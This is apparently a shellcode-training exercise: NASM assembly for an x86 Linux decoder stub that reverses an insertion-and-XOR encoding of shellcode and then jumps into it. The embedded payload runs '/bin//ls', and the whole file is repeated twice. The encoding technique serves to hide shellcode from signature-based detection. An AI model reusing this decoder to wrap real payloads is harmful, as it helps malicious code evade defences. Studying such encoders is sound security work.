ahpaleus/insertion-xor-decoder.nasm

## insertion-xor-decoder.nasm
global _start

section .text
_start:
	jmp short call_shellcode ; jmp-call-pop technique to put shellcode onto stack

decoder:
	pop esi ; address of the EncodedShellcode from stack to ESI

	lea edi, [esi +1] ; load effective address->2nd position to EDI
	xor eax, eax ; zeroing of EAX
	mov al, 1 ; move 0x1 to EAX
	xor ebx, ebx ; zeroing of EBX

decode:
	mov bl, byte [esi + eax] ; move specific byte the 2nd byte to EBX, at the first pass it shall be 0x39
	xor bl, 0xaa ; XOR EBX with 0xAA, at the first pass it shall be 0x93
	jz short deXORING ; if zero flag is set jump deXORING
	mov bl, byte [esi + eax + 1] ; move the next byte to edx, the first pass -> 0x6a
	mov byte [edi], bl ; move above value to the EDI (EncodedShellcode)
	inc edi ; increment the EDI value
	add al, 2 ; move 2 to the EAX
	jmp short decode ; repeat this decoding loop (until the zero flag and moving )

; After loop we have shellcode, but we have to XOR it again

deXORING:
	; we have our shellcode at the ESI address
	xor ebx, ebx ; Zeroing values
	xor eax, eax
	mov al, 0
l1: ; the XOR loop
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jz short EncodedShellcode
	mov byte [esi+eax], bl
	inc eax
	jmp short l1


call_shellcode:
	call decoder ; EncodedShellcode onto stack
	EncodedShellcode: db 0x9b,0x39,0x6a,0x7e,0xfa,0xc8,0xc2,0xc5,0x85,0x89,0x85,0x1c,0xc6,0xb2,0xd9,0xbc,0xc2,0x7d,0x85,0x60,0xc8,0xbc,0xc3,0x21,0xc4,0xfd,0x23,0x48,0x49,0xb3,0xfa,0x07,0x23,0xe2,0x48,0x7d,0xf9,0xd5,0x23,0x01,0x4b,0x94,0x1a,0x37,0xa1,0xbc,0x67,0xa8,0x2a,0x66,0xaa


; XORed:
; 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xc6,0xd9,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,

; Original:
; \x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
	global _start

	section .text
	_start:
	jmp short call_shellcode ; jmp-call-pop technique to put shellcode onto stack

	decoder:
	pop esi ; address of the EncodedShellcode from stack to ESI

	lea edi, [esi +1] ; load effective address->2nd position to EDI
	xor eax, eax ; zeroing of EAX
	mov al, 1 ; move 0x1 to EAX
	xor ebx, ebx ; zeroing of EBX

	decode:
	mov bl, byte [esi + eax] ; move specific byte the 2nd byte to EBX, at the first pass it shall be 0x39
	xor bl, 0xaa ; XOR EBX with 0xAA, at the first pass it shall be 0x93
	jz short deXORING ; if zero flag is set jump deXORING
	mov bl, byte [esi + eax + 1] ; move the next byte to edx, the first pass -> 0x6a
	mov byte [edi], bl ; move above value to the EDI (EncodedShellcode)
	inc edi ; increment the EDI value
	add al, 2 ; move 2 to the EAX
	jmp short decode ; repeat this decoding loop (until the zero flag and moving )

	; After loop we have shellcode, but we have to XOR it again

	deXORING:
	; we have our shellcode at the ESI address
	xor ebx, ebx ; Zeroing values
	xor eax, eax
	mov al, 0
	l1: ; the XOR loop
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jz short EncodedShellcode
	mov byte [esi+eax], bl
	inc eax
	jmp short l1




	call_shellcode:
	call decoder ; EncodedShellcode onto stack
	EncodedShellcode: db 0x9b,0x39,0x6a,0x7e,0xfa,0xc8,0xc2,0xc5,0x85,0x89,0x85,0x1c,0xc6,0xb2,0xd9,0xbc,0xc2,0x7d,0x85,0x60,0xc8,0xbc,0xc3,0x21,0xc4,0xfd,0x23,0x48,0x49,0xb3,0xfa,0x07,0x23,0xe2,0x48,0x7d,0xf9,0xd5,0x23,0x01,0x4b,0x94,0x1a,0x37,0xa1,0xbc,0x67,0xa8,0x2a,0x66,0xaa



	; XORed:
	; 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xc6,0xd9,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,

	; Original:
	; \x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80